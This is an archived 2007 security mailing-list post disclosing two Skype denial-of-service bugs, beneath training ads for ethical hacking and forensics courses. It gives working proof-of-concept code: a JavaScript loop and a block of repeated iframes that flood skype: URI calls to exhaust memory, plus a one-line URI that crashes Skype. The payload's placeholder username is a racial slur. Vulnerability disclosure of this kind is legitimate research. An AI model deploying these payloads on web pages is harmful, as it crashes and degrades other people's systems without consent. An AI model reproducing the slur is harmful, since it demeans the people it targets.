Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Skype DoS

Subject: Skype DoS
Date: 25 Nov 2007 19:50:55 -0000

1. Skype and Internet Explorer uri handler mechanism memory resources 
consumption bug:

<script>
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
</script>

This will invoke many skype.exe processes and as they are not closed - much 
memory will be consumed. Such script will be blocked by popup blocker, so it is 
possible to do it other way:

<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
... I've used about megabyte of such crap
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>

Tested on IE7, WinXP SP2 and skype 3.6.0.216

2. Unexploitable Skype null pointer dereference:

skype:?voicemail

To trigger the bug a right mouse button must be clicked, or menu button 
selected. Skype should crash :)

Found here: http://www.critical.lt/?opinions/show/1433
credits: Critical Security

<Prev in Thread] Current Thread [Next in Thread>
  • Skype DoS, mail <=